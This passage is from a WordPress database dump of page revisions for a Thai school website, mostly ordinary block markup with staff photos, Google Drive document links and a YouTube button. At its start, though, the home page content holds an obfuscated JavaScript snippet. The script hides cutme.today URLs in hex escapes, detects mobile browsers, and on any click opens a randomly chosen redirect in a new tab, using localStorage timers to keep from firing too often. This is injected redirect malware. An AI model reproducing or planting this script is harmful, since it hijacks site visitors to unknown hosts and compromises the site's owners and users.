_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 16:39:08','2025-07-15 09:39:08','',19,'http://watprato.ssk.in.th/?p=719',0,'revision','',0),
(720,1,'2025-07-15 16:40:07','2025-07-15 09:40:07','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- 